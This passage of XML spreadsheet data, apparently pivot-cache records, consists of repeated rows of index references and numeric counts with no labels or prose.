  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="471"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="471"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="471"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="365"/>
    <x v="471"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="306"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="306"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="472"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="472"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="472"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="472"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="473"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="473"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="473"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="473"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="473"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="473"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="14"/>
    <x v="474"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="474"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="474"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="474"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="38"/>
    <x v="474"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="474"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="475"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="35"/>
    <x v="475"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="60"/>
    <x v="475"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="475"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="16"/>
    <x v="476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="43"/>
    <x v="476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="476"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="476"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="476"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="476"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="13"/>
    <x v="478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="13"/>
    <x v="478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="71"/>
    <x v="478"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="15"/>
    <x v="478"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="5"/>
    <x v="478"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="47"/>
    <x v="478"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="164"/>
    <x v="478"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="478"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="11"/>
    <x v="479"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="479"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="479"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="479"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="145"/>
    <x v="476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="165"/>
    <x v="476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="168"/>
    <x v="476"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="259"/>
    <x v="480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="385"/>
    <x v="480"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="60"/>
    <x v="480"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="480"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="480"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="17"/>
    <x v="481"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="481"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="482"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="482"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="482"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="482"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="482"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="482"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="25"/>
    <x v="482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="483"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="483"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="483"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="483"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="190"/>
    <x v="483"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="483"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="13"/>
    <x v="484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="77"/>
    <x v="484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="191"/>
    <x v="484"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="484"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="484"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="59"/>
    <x v="484"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="64"/>
    <x v="484"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="484"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="485"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="14"/>
    <x v="485"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="485"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="486"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="17"/>
    <x v="486"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="486"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="486"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="487"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="487"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="488"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="488"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="488"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="489"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="489"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="10"/>
    <x v="489"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="489"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="490"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="20"/>
    <x v="490"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="490"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="490"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="491"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="491"/>
  </r>
